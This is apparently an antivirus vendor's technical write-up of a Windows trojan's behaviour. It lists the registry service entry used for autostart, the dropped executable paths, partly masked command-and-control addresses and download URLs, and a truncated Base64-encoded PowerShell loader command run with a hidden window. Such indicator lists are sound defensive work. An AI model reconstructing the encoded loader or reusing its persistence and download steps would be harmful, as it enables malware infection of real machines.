Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\tsmf] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\tsmf] 'ImagePath' = '"%WINDIR%\SysWOW64\Wpc\tsmf.exe"'
- 'tsmf' "%WINDIR%\SysWOW64\Wpc\tsmf.exe"
- 'tsmf' %WINDIR%\SysWOW64\Wpc\tsmf.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGEAOQBpAGEANQA2AD0AKAAnAEYAJwArACcANwAnACsAKAAnAGIAcgBtACcAKwAnAGQANwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAHIATwBGAEkAbABFAFwARABnAGcATQBPAD...
- %HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe
- %WINDIR%\syswow64\wpc\tsmf.exe
- %HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe в %WINDIR%\syswow64\wpc\tsmf.exe
- '82.#30.1.24':80
- '51.##.124.206':80
- http://qs##ide.com/img/1W/
- http://51.##.124.206/2Z90sHq5ZQJ/AP3UlSA/BrOJfKq8rBS/R39mXOKIG1T6aj3Ng/
- DNS ASK qs##ide.com
- '%HOMEPATH%\dggmo91\pdnouoc\luwfh3_t.exe'
- '%WINDIR%\syswow64\wpc\tsmf.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAGEAOQBpAGEANQA2AD0AKAAnAEYAJwArACcANwAnACsAKAAnAGIAcgBtACcAKwAnAGQANwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAUgBQAHIATwBGAEkAbABFAFwARABnAGcATQBPAD...' (со скрытым окном)